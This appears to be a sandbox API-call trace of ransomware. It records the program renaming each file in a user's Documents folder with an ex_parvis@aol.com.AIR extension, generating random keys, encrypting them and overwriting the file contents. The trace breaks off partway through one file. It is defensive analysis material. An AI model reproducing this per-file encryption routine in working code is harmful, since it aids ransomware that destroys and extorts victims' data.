	[0099.963] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H 8 Lqx.ots", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H 8 Lqx.ots.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H 8 Lqx.ots.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.963] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H 8 Lqx.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h 8 lqx.ots"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H 8 Lqx.ots.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h 8 lqx.ots.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.965] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H 8 Lqx.ots.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h 8 lqx.ots.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.966] GetProcessHeap () returned 0x540000
	[0099.966] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0099.966] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=37160) returned 1
	[0099.966] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x9128
	[0099.966] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.966] GetProcessHeap () returned 0x540000
	[0099.966] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.966] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.966] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.967] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.967] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.967] ReadFile (in: hFile=0x380, lpBuffer=0x601bb8, nNumberOfBytesToRead=0x9128, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bb8*, lpNumberOfBytesRead=0x3a1f778*=0x9128, lpOverlapped=0x0) returned 1
	[0099.968] SetFilePointer (in: hFile=0x380, lDistanceToMove=-37160, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.968] WriteFile (in: hFile=0x380, lpBuffer=0x60ace8*, nNumberOfBytesToWrite=0x9128, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x60ace8*, lpNumberOfBytesWritten=0x3a1f778*=0x9128, lpOverlapped=0x0) returned 1
	[0099.969] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.969] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.969] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gY690tyyznk.pptx", dwFileAttributes=0x80) returned 1
	[0099.969] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gY690tyyznk.pptx") returned 57
	[0099.969] GetProcessHeap () returned 0x540000
	[0099.969] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd8) returned 0x598b60
	[0099.969] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gY690tyyznk.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gY690tyyznk.pptx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gY690tyyznk.pptx"
	[0099.969] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gY690tyyznk.pptx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gY690tyyznk.pptx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gY690tyyznk.pptx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.969] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gY690tyyznk.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gy690tyyznk.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gY690tyyznk.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gy690tyyznk.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.972] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gY690tyyznk.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gy690tyyznk.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.972] GetProcessHeap () returned 0x540000
	[0099.972] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.972] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=5431) returned 1
	[0099.972] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1537
	[0099.972] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.972] GetProcessHeap () returned 0x540000
	[0099.972] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.972] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.972] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.973] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.973] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.973] ReadFile (in: hFile=0x380, lpBuffer=0x601bb8, nNumberOfBytesToRead=0x1537, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bb8*, lpNumberOfBytesRead=0x3a1f778*=0x1537, lpOverlapped=0x0) returned 1
	[0099.973] SetFilePointer (in: hFile=0x380, lDistanceToMove=-5431, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.973] WriteFile (in: hFile=0x380, lpBuffer=0x6030f8*, nNumberOfBytesToWrite=0x1537, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x6030f8*, lpNumberOfBytesWritten=0x3a1f778*=0x1537, lpOverlapped=0x0) returned 1
	[0099.973] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.973] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.973] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DeuDpnSB_N80.docx", dwFileAttributes=0x80) returned 1
	[0099.974] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DeuDpnSB_N80.docx") returned 58
	[0099.974] GetProcessHeap () returned 0x540000
	[0099.974] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xda) returned 0x598b60
	[0099.974] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DeuDpnSB_N80.docx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DeuDpnSB_N80.docx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DeuDpnSB_N80.docx"
	[0099.974] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DeuDpnSB_N80.docx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DeuDpnSB_N80.docx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DeuDpnSB_N80.docx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.974] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DeuDpnSB_N80.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\deudpnsb_n80.docx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DeuDpnSB_N80.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\deudpnsb_n80.docx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.976] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DeuDpnSB_N80.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\deudpnsb_n80.docx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.976] GetProcessHeap () returned 0x540000
	[0099.976] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.976] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=39563) returned 1
	[0099.976] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x9a8b
	[0099.976] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.976] GetProcessHeap () returned 0x540000
	[0099.976] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.976] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.976] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.977] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.977] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.977] ReadFile (in: hFile=0x380, lpBuffer=0x601bb8, nNumberOfBytesToRead=0x9a8b, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bb8*, lpNumberOfBytesRead=0x3a1f778*=0x9a8b, lpOverlapped=0x0) returned 1
	[0099.978] SetFilePointer (in: hFile=0x380, lDistanceToMove=-39563, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.978] WriteFile (in: hFile=0x380, lpBuffer=0x60b650*, nNumberOfBytesToWrite=0x9a8b, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x60b650*, lpNumberOfBytesWritten=0x3a1f778*=0x9a8b, lpOverlapped=0x0) returned 1
	[0099.978] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.978] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.978] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0099.978] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned 52
	[0099.978] GetProcessHeap () returned 0x540000
	[0099.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xce) returned 0x59d258
	[0099.978] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini"
	[0099.978] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.978] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.981] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.981] GetProcessHeap () returned 0x540000
	[0099.981] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0099.981] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=402) returned 1
	[0099.981] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x192
	[0099.981] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.981] GetProcessHeap () returned 0x540000
	[0099.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.981] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.981] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.982] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.982] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.982] ReadFile (in: hFile=0x380, lpBuffer=0x56efb8, nNumberOfBytesToRead=0x192, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56efb8*, lpNumberOfBytesRead=0x3a1f778*=0x192, lpOverlapped=0x0) returned 1
	[0099.982] SetFilePointer (in: hFile=0x380, lDistanceToMove=-402, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.982] WriteFile (in: hFile=0x380, lpBuffer=0x5ffbd0*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbd0*, lpNumberOfBytesWritten=0x3a1f778*=0x192, lpOverlapped=0x0) returned 1
	[0099.983] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.983] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.983] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CJSmOL9U.doc", dwFileAttributes=0x80) returned 1
	[0099.983] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CJSmOL9U.doc") returned 53
	[0099.983] GetProcessHeap () returned 0x540000
	[0099.983] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd0) returned 0x59d258
	[0099.983] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CJSmOL9U.doc" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CJSmOL9U.doc") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CJSmOL9U.doc"
	[0099.983] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CJSmOL9U.doc", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CJSmOL9U.doc.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CJSmOL9U.doc.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.983] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CJSmOL9U.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cjsmol9u.doc"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CJSmOL9U.doc.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cjsmol9u.doc.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.985] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CJSmOL9U.doc.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cjsmol9u.doc.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.986] GetProcessHeap () returned 0x540000
	[0099.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0099.986] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=76946) returned 1
	[0099.986] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x12c92
	[0099.986] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.986] GetProcessHeap () returned 0x540000
	[0099.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.986] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.986] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.987] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.987] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.988] ReadFile (in: hFile=0x380, lpBuffer=0x603bb8, nNumberOfBytesToRead=0x12c92, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x603bb8*, lpNumberOfBytesRead=0x3a1f778*=0x12c92, lpOverlapped=0x0) returned 1
	[0099.989] SetFilePointer (in: hFile=0x380, lDistanceToMove=-76946, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.989] WriteFile (in: hFile=0x380, lpBuffer=0x3790048*, nNumberOfBytesToWrite=0x12c92, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790048*, lpNumberOfBytesWritten=0x3a1f778*=0x12c92, lpOverlapped=0x0) returned 1
	[0099.989] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.989] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.989] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bmmU9q.docx", dwFileAttributes=0x80) returned 1
	[0099.990] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bmmU9q.docx") returned 52
	[0099.990] GetProcessHeap () returned 0x540000
	[0099.990] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xce) returned 0x59d258
	[0099.990] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bmmU9q.docx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bmmU9q.docx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bmmU9q.docx"
	[0099.990] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bmmU9q.docx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bmmU9q.docx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bmmU9q.docx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.990] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bmmU9q.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bmmu9q.docx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bmmU9q.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bmmu9q.docx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.994] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bmmU9q.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bmmu9q.docx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.994] GetProcessHeap () returned 0x540000
	[0099.994] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0099.994] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=19201) returned 1
